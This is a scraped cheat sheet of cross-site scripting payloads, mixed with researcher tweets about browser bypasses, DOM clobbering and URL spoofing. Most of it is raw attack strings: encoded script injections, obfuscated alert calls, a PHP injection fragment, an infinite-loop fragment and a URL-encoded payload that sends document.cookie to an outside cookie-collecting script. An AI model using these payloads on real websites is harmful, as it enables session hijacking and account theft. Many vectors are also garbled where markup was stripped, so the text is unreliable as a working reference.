a

[lordhomea]

ＸＳＳ ＳＥＣＵＲＩＴＹ ＰＲＯＢＬＥＭＳ． ＣＯＬＬＥＣＴＥＤ ＢＹ ＠０ｘ７８７３７３

STANDARD XSS VECTORS:

< script > < / script> &lt < &LT < < << <<< ">

<

'> '> ";alert('XSS');// %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E &ltscript&gtalert(document.cookie); &ltscript&gtalert(document.cookie);&ltscript&gtalert

"> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E "> %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//>!--=&{} '';!--"=&{()} ','')); phpinfo(); exit;/* var n=0;while(true){n;}]]> SCRIPT]]>alert('XSS');/SCRIPT]]> SCRIPT]]>alert('XSS');/SCRIPT]]> ]]> <IMG SRC="javascript:alert('XSS')"> ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ TWITTER @xssvector Tweets: Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.' Reverse 401 basic auth phishing by @jackmasa POC: document.domain='com' chrome/safari same domain suffix cross-domain trick. Safari empty location bar bug by @jackmasa POC: Safari location object pollution tech: by @kinugawamasato Safari URL spoofing about://mmme.me POC: Opera URL spoofing vuln data://mmme.me by @jackmasa POC: Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F Opera data:message/rfc822 #XSS by @insertScript #IE IE cool expression xss

Clever webkit xss auditor bypass trick and %c0″//(%000000%0dalert(1)// #IE #0day new XMLHttpRequest().open("GET", "data:text/html,", false); #firefox #datauri

XSS

#firefox #IE "clickme #IE #xssfilter @kinugawamasato Components.lookupMethod(self, 'alert')(1) #firefox external.NavigateAndFind(' ',[],[]) #IE #URLredirect IE decides charset as #utf-7 @hasegawayosuke #opera #chrome #IE9 #svg #vbscript setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox #E4X <{alert(1)}>.(alert(3)).@wtf.(wtf) by @garethheyes #vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356 ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')() No referer : ​ #VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub] if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console #Firefox #Opera #Chrome #Safari #XSS document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS header('Refresh: 0;url=javascript:alert(1)'); click #CSS expression #ES #FF for(location of ['javascript:alert(/ff/)']); #E4X function::['location']='javascript'':alert(/FF/)' HTML5 entity char test #Firefox click by @cgvwzq

CSS and CSS :P toUpperCase XSS document.write('<ı onclıck=alert(1)>asd'.toUpperCase()) by @jackmasa IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val(" by @0x6D6172696F DOM clobbering:

clobbered location object on IE. DOM clobbering: clobbered document->body by @jackmasa Classic IE backtick DOM XSS: Firefox click=>google by @garethheyes click by @kkotowicz Opera click variant base64 encode. by @jackmasa Opera IE less xss,20 chars. by @0x6D6172696F click no referrer by @sneak_ FF no referrer by @sneak_ No dos expression vector by @jackmasa by @0x6D6172696F JSLR( @garethheyes ) challenge result: @irsdl challenge result: Vbscript XHR by @masa141421356 XML Entity XSS by @garethheyes Webkit Classic vector by slacker :D name Classic html entity inject vector A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript Upload a jar file => Firefox XSS by @0x6D6172696F JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke IE6-7 Inject vector by @kinugawamasato IE UTF7 BOM XSS by @garethheyes by @garethheyes FF CLICK by @0x6D6172696F